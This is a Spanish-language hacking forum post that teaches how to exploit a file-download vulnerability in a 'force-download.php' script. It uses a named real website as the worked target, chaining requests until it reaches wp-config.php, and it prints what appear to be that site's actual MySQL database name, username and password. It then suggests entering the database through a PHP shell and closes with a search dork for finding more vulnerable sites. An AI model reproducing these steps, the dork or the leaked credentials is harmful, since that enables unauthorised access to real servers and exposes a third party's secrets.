Explotando Full Source Diclosure Bugueando "force-download.php"

Leyendo un post de zeus en ddlr sobre esto me puse a googlear y encontre este script que es vulnerable al path dicluser force-download.php que te deja bajar hasta los chescos del server.

simplemente tenemos la web:

http://www.xxx.xx.xx/force-download.php?file=archivo.pdf
cambiamos el archivo.pdf por "force-download.php" para comprobar que es vulnerable. si te da a descargar proseguimos a bajar el index.php

http://www.xxx.xx.xx/force-download.php?file=index.php y sacaremos muchos mas datos. como el config.php entre otros
para prueba un boton:

http://www.expo2010chile.cl/force-download.php?file=force-download.php juaz baja,
http://www.expo2010chile.cl/force-download.php?file=index.php era de esperarce Grin
en este caso sacamos esto:
Código:

/** Loads the WordPress Environment and Template */
require('./wp2/wp-blog-header.php')

http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-blog-header.php
de este:
Código:

require_once( dirname(__FILE__) . '/wp-load.php' );


http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-load.php

Código:

/** The config file resides in ABSPATH */
require_once( ABSPATH . 'wp-config.php' );


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp2_expo2010chile');

/** MySQL database username */
define('DB_USER', 'wp2_eXpoCh1le');

/** MySQL database password */
define('DB_PASSWORD', 'wUyUBaTEphac8UG');

/** MySQL hostname */
define('DB_HOST', 'localhost');

y simplemente desde una php-shellentramos por el SQL y entramos directo a la db =D
happy hacking

dork: "allinurl: "force-download.php?file= .pdf""